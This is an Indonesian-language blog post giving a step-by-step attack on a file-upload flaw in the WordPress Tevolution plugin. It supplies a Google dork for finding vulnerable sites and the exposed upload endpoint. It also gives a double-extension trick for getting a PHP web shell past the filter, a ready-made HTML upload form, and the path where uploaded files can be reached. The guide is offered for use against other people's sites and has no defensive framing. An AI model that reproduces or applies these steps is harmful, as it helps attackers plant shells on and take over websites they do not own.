Google Dork : Index of /wp-content/plugins/Tevolution/
Exploit : https://websites/wordpress
/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
Bypass Shell : files.php.xxxjpg
Gagal Bypass ? Upload Biasa Aja : files.txt
~ Step By Step ~
1. Cari Website Target, Bisa Menggunakan Dork Diatas, Kalau Bisa Kembangin Lagi Dorknya ^_^
2. Masukan Exploitnya Diakhiran Website Atau Setelah Website,
Jika Vuln, Tampilannya Akan BLANK Warna Putih.
3. Setelah Berhasil Menemukan Yang Vuln, Silahkan Buat File CSRF.html
<form action="https://website/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>
Edit Tanda Merah (Url) Itu, Lalu Simpan Filenya Dengan Ext.HTML
4. Lalu Buka File CSRF Tersebut Dan Upload "files.php.xxxjpg" Atau "files.txt"
Jika Berhasil, Muncul Kode Random (Nama File Random)
5. Dan Untuk Melihat Hasilnya Bisa Ditambahkan Url Seperti Ini.
https://WordPress/wp-content/themes/Directory/images/tmp/random-files.ext
Terima Kasih,
0 komentar
Posting Komentar